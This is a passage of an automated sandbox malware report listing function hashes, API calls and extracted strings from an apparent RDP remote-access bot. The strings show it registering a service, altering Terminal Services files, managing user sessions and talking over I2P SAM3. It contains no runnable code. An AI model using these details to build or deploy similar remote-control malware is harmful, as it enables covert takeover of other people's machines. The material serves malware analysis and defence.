                                    • Instruction ID: 93f2175aa817333ef3fbd2e82b0faabe9772192cb275143ae5cee37152dbf2fb
                                    • Opcode Fuzzy Hash: 2f0353d3db8fb330f785c6b32531c3accab744cb25dd3148899e22b66600bbd7
                                    • Instruction Fuzzy Hash: A4510BA0A2CBCB85F7625B34DC8437D1290AF06365F1C03B2C96E662E5DE5E6986D341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                    • API String ID: 1423203057-455140666
                                    • Opcode ID: f50e9b3dd0fca16c9fcd6d8fb6605af767c60272be40fce02ffdc5a75f97fa7f
                                    • Instruction ID: f0061e538eed335c3d8cb90b7b10d4d4ccf6875eac0340065fe2ae0710b0d27a
                                    • Opcode Fuzzy Hash: f50e9b3dd0fca16c9fcd6d8fb6605af767c60272be40fce02ffdc5a75f97fa7f
                                    • Instruction Fuzzy Hash: CEA1F4A2A0F682D1FA60AB01E4447B9AB50AF54788FCA44B5DE4D077E6DF3CE547C720
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-910542497
                                    • Opcode ID: d3e153d5162876c951e0a18dd3ff242136115f62eb196bb78df5ab11fa445c98
                                    • Instruction ID: 325825740e6649093313b6a8f011be830fc16de359db7a9a727604765f31c167
                                    • Opcode Fuzzy Hash: d3e153d5162876c951e0a18dd3ff242136115f62eb196bb78df5ab11fa445c98
                                    • Instruction Fuzzy Hash: 75A1307090F74BC5FA70B700A4503B8A654AF10748FC645B2DA1E46EF1FE6EE9879322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
                                    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                    • API String ID: 871770459-375624272
                                    • Opcode ID: f8c33c4a360ef6605c9394e17d8449d9f368e4f65d6596517dbd2c321b63955d
                                    • Instruction ID: d57445bfe3962096a073f5c189efaf7a4d129d3550a7e8d82dd7b6ba4cfb87d9
                                    • Opcode Fuzzy Hash: f8c33c4a360ef6605c9394e17d8449d9f368e4f65d6596517dbd2c321b63955d
                                    • Instruction Fuzzy Hash: 6E513AA0A1968386FA129735EC143BD2352AF677A4F1C07B1C83E277E9EE3DE4418340
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    • Opcode ID: a9cfa513d65dda842968a09f2c7885b9ac902f19089e2b66a96150b2426b3235
                                    • Instruction ID: 36e48ceb4774ffd650a74ed4916404cd4296905667f4ec849e68d333cfd1cb93
                                    • Opcode Fuzzy Hash: a9cfa513d65dda842968a09f2c7885b9ac902f19089e2b66a96150b2426b3235
                                    • Instruction Fuzzy Hash: 3D511CB6A0CA9286FB55CF25E8443A977A1FB8AB44F004135DA4D97768DFBCED09C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    • Opcode ID: 2d87311861eb02190fa449cb48334dc650300a6d4b2998b0211e0cf4d148ea92
                                    • Instruction ID: 069f2ba5af5981a042ddc01c76f9ea2727538d22df9f386cdce7a988136545ef
                                    • Opcode Fuzzy Hash: 2d87311861eb02190fa449cb48334dc650300a6d4b2998b0211e0cf4d148ea92
                                    • Instruction Fuzzy Hash: 67512CB6A0CA9286FB55CF25E8443A977A1FB8AB44F004135DA4D97768DFBCED09C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    • Opcode ID: 3d001d083c48550922089760a03752ce89d170950a5eef2fd23022bf11b59532
                                    • Instruction ID: 08724e651f8c570489a591d62137956c9a72648727f891bcc7e5689ec5bd346f
                                    • Opcode Fuzzy Hash: 3d001d083c48550922089760a03752ce89d170950a5eef2fd23022bf11b59532
                                    • Instruction Fuzzy Hash: EA513DB2A0CA8286FB55CF25E84436977A1FB86B44F004135DA4D97768DFBCED08C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    • Opcode ID: 66a670e81523c3fe5a232aa40d61afef281c029db23b07f3ea9cd7eedaeb48f8
                                    • Instruction ID: 0469e598d40adefdf963e34576d30d14de1d7cde671050da9ec46e55aa2d3b55
                                    • Opcode Fuzzy Hash: 66a670e81523c3fe5a232aa40d61afef281c029db23b07f3ea9cd7eedaeb48f8
                                    • Instruction Fuzzy Hash: 02513EB6A0CA8286FB55CF25E84436977A1FB86B44F004135DA4D97768DFBCED08C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                    • API String ID: 546114577-3142219161
                                    • Opcode ID: 60b43ea0fec3ecdd4994f0e9939f40f7a874bff0120a8f17aa55c584a946f3f7
                                    • Instruction ID: 73eb339f89f4b8bad1befbbf1ab3ecd7fb5339148ce0e80764a145a5c9900dd1
                                    • Opcode Fuzzy Hash: 60b43ea0fec3ecdd4994f0e9939f40f7a874bff0120a8f17aa55c584a946f3f7
                                    • Instruction Fuzzy Hash: CB41B5E0F1D68792FB625771ECC13B82264AF1A344F901436C95ECA2B5DEEDAD84D302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                    • API String ID: 610085118-1825955162
                                    • Opcode ID: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
                                    • Instruction ID: 9136b22fd859fb3eac35d2dd3cf53f5e6322e5e758fb1aaced7769c52152c2b1
                                    • Opcode Fuzzy Hash: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
                                    • Instruction Fuzzy Hash: 4F516CB1A09AC686E6178B25FC4027D67A5FF66B91F0C06B5DA4E637B8DF3DE4418300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                    • API String ID: 1721699506-2819899730
                                    • Opcode ID: c12c4897f06361b5c5be79282b14c29c4095b970d2d52a14e29f25ffe9cd5858
                                    • Instruction ID: 94d472c1c922d53b8101cb8fff6aafba3486cdda17f8cede00aa93e0311b4fd0
                                    • Opcode Fuzzy Hash: c12c4897f06361b5c5be79282b14c29c4095b970d2d52a14e29f25ffe9cd5858
                                    • Instruction Fuzzy Hash: 63614E61A0F587D5FA30AB54E8403F8A251AFA1358FD741B2E90D47AB0DE3CE9C78325
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CompareCriticalEnterFileSectionTime
                                    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                    • API String ID: 3718746087-844192579
                                    • Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                    • Instruction ID: 8a9b7031c55847af1ed404f42a79a55b306443e853f46a0de31775fc45514360
                                    • Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                    • Instruction Fuzzy Hash: 6151A091B0C6C341FB239A35ED903FA56919F87784F480031DA4DCB7AAEEACDD058742
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
                                    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                    • API String ID: 2654219296-2700516951
                                    • Opcode ID: cf18c09c1f466c897043092cb03779a4c5790caca8904f4f3b0c822cb66c5fc2
                                    • Instruction ID: 1e44a263ebbad573ad43bf745188b16e982028f4cf7506be6240fb9cca4de99d
                                    • Opcode Fuzzy Hash: cf18c09c1f466c897043092cb03779a4c5790caca8904f4f3b0c822cb66c5fc2
                                    • Instruction Fuzzy Hash: 48413EA1A09AC681EF168F31DC5027C23A5AF5AB65F1C0BB5C92E663F9DF3DE4408350
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$strcmp
                                    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                    • API String ID: 245486318-5999096
                                    • Opcode ID: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
                                    • Instruction ID: ef6a8d10f8ca05d7576d651605659a4f7f0a8e163a60f72ff049ac8f38dbd673
                                    • Opcode Fuzzy Hash: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
                                    • Instruction Fuzzy Hash: 67717AA9E1968281EA22DE35DCA837D2250AF417B4F1C43B5DDFD6B7D5EE2CE8018341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                    • API String ID: 3562457520-1478336053
                                    • Opcode ID: ff3701bf76a7f736c7c8bbc0a00331e4bc82fb3c2cc5cc884ae150488136f5bc
                                    • Instruction ID: a9a8b8a76ba04bbcb67b55c5db5ac861529d7512ec2590a873a13bdbc2bba487
                                    • Opcode Fuzzy Hash: ff3701bf76a7f736c7c8bbc0a00331e4bc82fb3c2cc5cc884ae150488136f5bc
                                    • Instruction Fuzzy Hash: 5F513910E0F607CAFB747B90B4803B8E1909F28755FD601B6D50E0A5F2DE5EA9879372
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                    • API String ID: 1135201459-1870638116
                                    • Opcode ID: 215ee8e1e7e3a5955a77bedf4edb801da3009a201c4daffdb7a2e065cda0b47b
                                    • Instruction ID: 6b2c484fd1e4280b7d022829346fc4be9e42f7e524d370f38b3c496c3a68d01f
                                    • Opcode Fuzzy Hash: 215ee8e1e7e3a5955a77bedf4edb801da3009a201c4daffdb7a2e065cda0b47b
                                    • Instruction Fuzzy Hash: A4319DD9A1E6C685FA529F31EC883BD6350BF84BC0F4C41B4D9CE66799EE2CE5058300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocFreestrcpystrlen
                                    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                    • API String ID: 925994320-1558387473
                                    • Opcode ID: 9c37c831d31a8705c42675395a9b1d5eb539fc28c1d974cf7f18437bc9b1a997
                                    • Instruction ID: 4154723dd874d751df39c8120d39e1d950858bde60cad810e8821cfcd0c10442
                                    • Opcode Fuzzy Hash: 9c37c831d31a8705c42675395a9b1d5eb539fc28c1d974cf7f18437bc9b1a997
                                    • Instruction Fuzzy Hash: 0D418FE1A0D78281F65AAF35DC447796661EF46B84F040534EE0E873A6DEBDEE4AC310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen
